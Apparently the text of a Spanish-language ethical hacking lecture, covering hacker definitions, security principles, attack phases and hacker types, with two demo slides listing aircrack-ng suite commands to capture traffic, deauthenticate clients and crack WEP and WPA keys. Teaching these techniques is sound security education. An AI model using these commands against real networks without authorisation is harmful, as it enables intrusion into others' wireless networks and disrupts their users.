2. Disclaimer
Todos los contenidos, actividades y aplicaciones
(software) mostrados en esta conferencia son con fines
100% educativos, por lo cual los expositores e
institución educativa que los imparten se deslindan de
cualquier responsabilidad que los participantes pudieran
adquirir por el mal uso de estos.
3. Hacking Ético
El nombre hacker – neologismo utilizado para referirse
a un experto (Gurú) en varias o alguna rama técnica
relacionada con las tecnologías de la información y las
telecomunicaciones: programación, redes, sistemas
operativos.
Cracker – (criminal hacker, 1985). Un cracker es
alguien
que viola la seguridad de un sistema informático de
forma similar a como lo haría un hacker, sólo que a
diferencia de este último, el cracker realiza la intrusión
con fines de beneficio personal o para hacer daño a su
objetivo.
4. Hacking Ético
Hacker ético – profesionales de la seguridad que
aplican sus conocimientos de hacking con fines
defensivos (y legales).
Ethical Hacking es una disciplina de la seguridad
informática que se sustenta en que la mejor forma de
evaluar las amenazas que representan los llamados
“hackers” o piratas de la información es conocer cómo
actúan y operan.
5. Elementos esenciales de la
seguridad.
Confidencialidad – tiene que ver con la ocultación de
información o recursos.
Autenticidad - es la identificación y garantía del origen
de la información.
Integridad - Se refiere a cambios no autorizados en los
datos.
Disponibilidad – Posibilidad de hacer uso de la
información y recursos deseados.
6. Hacking Ético
1- Reconocimiento
• Pasivo
2- Rastreo (escaneo)
• Activo
3- Acceso
• Sistema operativo/aplicación
• Redes
• Denegación de servicio
4- Mantener el acceso
5- Borrado de huellas
7. Tipos de Hacker
- Black hats
• Individuals with extraordinary computing skills,
resorting to malicious or destructive activities. Also
known as „Crackers.‟
- White Hats
• Individuals professing hacker skills and using them for
defensive purposes. Also known as „Security Analysts‟.
- Gray Hats
• Individuals who work both offensively and defensively
at various times.
8. Perfil de habilidades de un
hacker ético
Experto en algún campo
de la informática.
Conocimientos profundos
de diversas plataformas
(Windows, Unix, Linux).
Conocimientos de redes.
Conocimientos de
hardware y software.
10. DEMO “Cracking Wireless
Passwords“
control + c
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
PARA WEP
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0
PARA WEP
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA
sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
11. DEMO “Cracking Wireless
Passwords“
PARA WEP
sudo aircrack-ng -z [nombre red]*.cap
Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de los
mismos, hasta que se nos muestre la clave de la red.
21. Conclusiones
La seguridad computacional como un todo.
El elemento humano dentro de la seguridad computacional.
El establecimiento de reglas para un mejor nivel de seguridad.
Necesidad de profesionistas calificados para estos trabajos.
Gran amplitud de herramientas OpenSource.
Compromiso social y ético para sistemas.
Innovación diaria.